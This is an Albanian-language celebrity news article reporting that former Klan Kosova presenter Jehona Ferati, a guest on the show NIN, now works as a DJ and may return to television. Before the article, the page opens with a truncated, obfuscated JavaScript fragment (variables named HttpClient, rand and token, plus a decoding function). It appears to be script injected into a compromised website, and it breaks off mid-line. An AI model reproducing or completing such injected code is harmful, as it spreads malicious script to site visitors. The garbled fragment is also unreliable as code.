;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A ju kujtohet Jehona e Klanit?! Ja me çfarë merret ajo sot

By

Pjesa e parë e emisionit NIN sonte iu kushtua figurave të ekranit të cilat kanë ndërpreë aktivitetin e tyre në këtë fushë tash e një kohë.

Me Alaudin Hamitin, Donika Lamaxhemën e Donika Gashin, të ftuar për të diskutuar mbi këtë temë ishin Nazmije Veseli, Benet Kaçi dhe Jehonë Ferati.

Derisa dy mysafirët e parë nuk janë shkëputur plotësisht nga puna në media, është Jehona ajo që tash e pesë vite i ka dhënë jetës së saj kahje të re.

Prezantuesja shumë e dashur për publikun për moderimin e emisionit ‘Ora e Pasdites’, edicioneve të lajmeve në Klan Kosova dhe jo vetëm, tash e disa vite merret me diçka ndryshe, duke krijuar një karrierë të suksesshme në punën e saj si DJ.

E pyetur në NIN mbi mundësinë e rikthimit në ekran, Jehona nuk e përjashtoi këtë pjesë duke deklaruar se ka disa ide në mendje që synon t’i konkretizojë.

Detajet ua sjell videoja e mëposhtme.

 

Artikuj të ngjashëm